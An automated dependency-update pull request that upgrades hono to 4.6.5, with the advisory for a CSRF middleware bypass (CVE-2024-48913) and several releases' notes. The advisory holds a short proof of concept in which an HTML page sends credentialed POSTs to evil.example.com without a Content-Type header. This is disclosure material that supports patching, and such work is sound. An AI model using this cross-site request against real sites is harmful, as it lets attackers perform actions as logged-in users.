fix(deps): update dependency hono to v4.6.5 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
hono (source)	4.5.8 -> 4.6.5

GitHub Vulnerability Alerts

CVE-2024-48913

Summary

Bypass CSRF Middleware by a request without Content-Type herader.

Details

Although the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.

https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89

PoC

// server.js
import { Hono } from 'hono'
import { csrf }from 'hono/csrf'
const app = new Hono()
app.use(csrf())
app.get('/', (c) => {
  return c.html('Hello Hono!')
})
app.post('/', async (c) => {
  console.log("executed")
  return c.text( await c.req.text())
})
Deno.serve(app.fetch)

<!-- PoC.html -->
<script>
async function myclick() {
    await fetch("http://evil.example.com", {
    method: "POST",
    credentials: "include",
    body:new Blob([`test`],{}),
    });
}
</script>
<input type="button" onclick="myclick()" value="run" />

Similarly, the fetch API does not add a Content-Type header for requests that do not include a Body.

await fetch("http://localhost:8000", { method: "POST", credentials: "include"});

Impact

Bypass csrf protection implemented with hono csrf middleware.

---

Release Notes

honojs/hono (hono)

v4.6.5

Compare Source

Security fix for CSRF Protection Middleware

This release includes a security fix for CSRF Protection Middleware. If you are using CSRF Protection Middleware, please upgrade this hono package immediately.

Before this release, a request without a Content-Type header can bypass the protection. This fix does not allow it. See: GHSA-2234-fmw7-43wr

What's Changed

• perf(types): replace intersection with union to get better perf by @​m-shaka in https://github.com/honojs/hono/pull/3443
• ci: use Deno v2 by @​yusukebe in https://github.com/honojs/hono/pull/3506
• ci: use Deno v2 for a test running for deno by @​nakasyou in https://github.com/honojs/hono/pull/3509
• fix(types): rm ExcludeEmptyObject to fix massively increased type instantiations by @​m-shaka in https://github.com/honojs/hono/pull/3507
• fix(cors): avoid setting Access-Control-Allow-Origin if there is no matching origin by @​uki00a in https://github.com/honojs/hono/pull/3510
• feat(powered-by): optional server name by @​PatrickJS in https://github.com/honojs/hono/pull/3492
• fix(factory): revert PR #​3498 by @​yusukebe in https://github.com/honojs/hono/pull/3515
• fix(build): remove private fields by @​nakasyou in https://github.com/honojs/hono/pull/3514

New Contributors

• @​uki00a made their first contribution in https://github.com/honojs/hono/pull/3510
• @​PatrickJS made their first contribution in https://github.com/honojs/hono/pull/3492

Full Changelog: honojs/hono@v4.6.4...v4.6.5

v4.6.4

Compare Source

What's Changed

• chore: upgrade dependencies by @​yusukebe in https://github.com/honojs/hono/pull/3446
• chore: remove crypto-js from dev dependencies by @​yusukebe in https://github.com/honojs/hono/pull/3447
• chore(test): suppress no-unused-vars "'x' is assigned a value but only used as type" by @​exoego in https://github.com/honojs/hono/pull/3451
• chore(test): include bun coverage by @​exoego in https://github.com/honojs/hono/pull/3457
• test(deno): remove duplicated app.get by @​exoego in https://github.com/honojs/hono/pull/3469
• fix(types): add key to IntrinsicAttributes by @​codehz in https://github.com/honojs/hono/pull/3474
• fix(factory): relax Bindings and Variables for createMiddleware by @​yusukebe in https://github.com/honojs/hono/pull/3498
• fix(service-worker): bind fetch to globalThis by @​sapphi-red in https://github.com/honojs/hono/pull/3500
• refactor(jsx): add override to toStringToBuffer in classes extending JSXNode by @​yusukebe in https://github.com/honojs/hono/pull/3505

New Contributors

• @​sapphi-red made their first contribution in https://github.com/honojs/hono/pull/3500

Full Changelog: honojs/hono@v4.6.3...v4.6.4

v4.6.3

Compare Source

This release has many new features, but each feature is small, so we've released it as a patch release.

What's Changed

• chore: rename runtime_tests to runtime-tests by @​yusukebe in https://github.com/honojs/hono/pull/3419
• ci: Type check perf by @​m-shaka in https://github.com/honojs/hono/pull/3406
• refactor(jsx/streaming): Clarified the type of renderToReadableStream. by @​usualoma in https://github.com/honojs/hono/pull/3434
• perf(types): use homomorphic mapped type to reduce conditional branches by @​m-shaka in https://github.com/honojs/hono/pull/3440
• ci: prettify type check result and rm a comment by @​m-shaka in https://github.com/honojs/hono/pull/3442
• fix(types): useSyncExternalStore type by @​codehz in https://github.com/honojs/hono/pull/3437
• fix(combine/every): make every middleware work with short-circuiting middlewares by @​paolostyle in https://github.com/honojs/hono/pull/3441
• feat(secureHeader): add CSP Report-Only mode support by @​isoppp in https://github.com/honojs/hono/pull/3413
• feat(jwt): make JwtVariables generic for improved type safety by @​TinsFox in https://github.com/honojs/hono/pull/3428
• feat(request): Make request.ts available throught JSR for frameworks that need to instantiate HonoRequest by @​Sorikairox in https://github.com/honojs/hono/pull/3425
• feat(jsx/precompile): Normalization and stringification of attribute values as renderToString by @​usualoma in https://github.com/honojs/hono/pull/3432
• feat(serve-static): support absolute root by @​yusukebe in https://github.com/honojs/hono/pull/3420

New Contributors

• @​codehz made their first contribution in https://github.com/honojs/hono/pull/3437
• @​paolostyle made their first contribution in https://github.com/honojs/hono/pull/3441
• @​isoppp made their first contribution in https://github.com/honojs/hono/pull/3413
• @​TinsFox made their first contribution in https://github.com/honojs/hono/pull/3428
• @​Sorikairox made their first contribution in https://github.com/honojs/hono/pull/3425

Full Changelog: honojs/hono@v4.6.2...v4.6.3

v4.6.2

Compare Source

What's Changed

• chore(lint): ESLint v9 by @​yusukebe in https://github.com/honojs/hono/pull/3393
• perf(serve-static): performance optimization for precompressed feature by @​usualoma in https://github.com/honojs/hono/pull/3414
• fix(serve-static): use application/octet-stream if the mime type is not detected by @​usualoma in https://github.com/honojs/hono/pull/3415

Full Changelog: honojs/hono@v4.6.1...v4.6.2

v4.6.1

Compare Source

What's Changed

• fix(build): improve addExtension esbuild plugin by @​kt3k in https://github.com/honojs/hono/pull/3405

New Contributors

• @​kt3k made their first contribution in https://github.com/honojs/hono/pull/3405

Full Changelog: honojs/hono@v4.6.0...v4.6.1

v4.6.0

Compare Source

Hono v4.6.0 is now available!

One of the highlights of this release is the Context Storage Middleware. Let's introduce it.

Context Storage Middleware

Many users may have been waiting for this feature. The Context Storage Middleware uses AsyncLocalStorage to allow handling of the current Context object even outside of handlers.

For example, let’s define a Hono app with a variable message: string.

type Env = {
  Variables: {
    message: string
  }
}

const app = new Hono<Env>()

To enable Context Storage Middleware, register contextStorage() as middleware at the top and set the message value.

import { contextStorage } from 'hono/context-storage'

//...

app.use(contextStorage())

app.use(async (c, next) => {
  c.set('message', 'Hello!')
  await next()
})

getContext() returns the current Context object, allowing you to get the value of the message variable outside the handler.

import { getContext } from 'hono/context-storage'

app.get('/', (c) => {
  return c.text(getMessage())
})

// Access the variable outside the handler.
const getMessage = () => {
  return getContext<Env>().var.message
}

In the case of Cloudflare Workers, you can also access the Bindings outside the handler by using this middleware.

type Env = {
  Bindings: {
    KV: KVNamespace
  }
}

const app = new Hono<Env>()

app.use(contextStorage())

const setKV = (value: string) => {
  return getContext<Env>().env.KV.put('key', value)
}

Thanks @​marceloverdijk !

New features

• feat(secureHeader): add Permissions-Policy header to secure headers middleware https://github.com/honojs/hono/pull/3314
• feat(cloudflare-pages): enable c.env.eventContext in handleMiddleware https://github.com/honojs/hono/pull/3332
• feat(websocket): Add generics type to WSContext https://github.com/honojs/hono/pull/3337
• feat(jsx-renderer): set Content-Encoding when stream is true https://github.com/honojs/hono/pull/3355
• feat(serveStatic): add precompressed option https://github.com/honojs/hono/pull/3366
• feat(helper/streaming): Support Promise<string> or (async) JSX.Element in streamSSE https://github.com/honojs/hono/pull/3344
• feat(context): make fetch Response headers mutable https://github.com/honojs/hono/pull/3318
• feat(serve-static): add onFound option https://github.com/honojs/hono/pull/3396
• feat(basic-auth): added custom response message option https://github.com/honojs/hono/pull/3371
• feat(bearer-auth): added custom response message options https://github.com/honojs/hono/pull/3372

Other changes

• chore(jsx-renderer): fix typo in JSDoc by @​taga3s in https://github.com/honojs/hono/pull/3378
• chore(deno): use the latest jsr libraries for testing by @​ryuapp in https://github.com/honojs/hono/pull/3375
• fix(secure-headers): optimize getPermissionsPolicyDirectives function by @​kbkn3 in https://github.com/honojs/hono/pull/3398
• fix(bearer-auth): typo by @​yusukebe in https://github.com/honojs/hono/pull/3404

New Contributors

• @​kbkn3 made their first contribution in https://github.com/honojs/hono/pull/3314
• @​hayatosc made their first contribution in https://github.com/honojs/hono/pull/3337
• @​inetol made their first contribution in https://github.com/honojs/hono/pull/3366

Full Changelog: honojs/hono@v4.5.11...v4.6.0

v4.5.11

Compare Source

What's Changed

• fix(jsx): race condition in ErrorBoundary with event loop by @​usualoma in https://github.com/honojs/hono/pull/3343
• perf(jsx): skip the special behavior when the element is in the head. by @​usualoma in https://github.com/honojs/hono/pull/3352
• refactor(utils/body): shorten the code by @​yusukebe in https://github.com/honojs/hono/pull/3353
• docs: Twitter to X by @​yusukebe in https://github.com/honojs/hono/pull/3354
• chore: fix typo in JSDoc by @​taga3s in https://github.com/honojs/hono/pull/3364
• refactor(utils/basic-auth): Moved Internal function to utils by @​sugar-cat7 in https://github.com/honojs/hono/pull/3359

New Contributors

• @​taga3s made their first contribution in https://github.com/honojs/hono/pull/3364
• @​sugar-cat7 made their first contribution in https://github.com/honojs/hono/pull/3359

Full Changelog: honojs/hono@v4.5.10...v4.5.11

v4.5.10

Compare Source

What's Changed

• feat(compress): improve compress middleware by @​nitedani in https://github.com/honojs/hono/pull/3317
• feat(jsx): add popover api attributes by @​ssssota in https://github.com/honojs/hono/pull/3323
• feat(jsx): improve form attribute types by @​ssssota in https://github.com/honojs/hono/pull/3330
• chore(test): migrate to vitest v2 by @​yasuaki640 in https://github.com/honojs/hono/pull/3326
• chore(test): replace deprecated vitest type by @​yasuaki640 in https://github.com/honojs/hono/pull/3338
• fix(logger): removing spaces from logger by @​marceloverdijk in https://github.com/honojs/hono/pull/3334

New Contributors

• @​nitedani made their first contribution in https://github.com/honojs/hono/pull/3317
• @​marceloverdijk made their first contribution in https://github.com/honojs/hono/pull/3334

Full Changelog: honojs/hono@v4.5.9...v4.5.10

v4.5.9

Compare Source

What's Changed

• test(types): broken test in future versions of typescript by @​m-shaka in https://github.com/honojs/hono/pull/3310
• fix(utils/color): Deno does not require permission for NO_COLOR by @​ryuapp in https://github.com/honojs/hono/pull/3306
• feat(jsx): improve type (MIME) attribute types by @​ssssota in https://github.com/honojs/hono/pull/3305
• feat(pretty-json): support custom query by @​nakasyou in https://github.com/honojs/hono/pull/3300

Full Changelog: honojs/hono@v4.5.8...v4.5.9

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.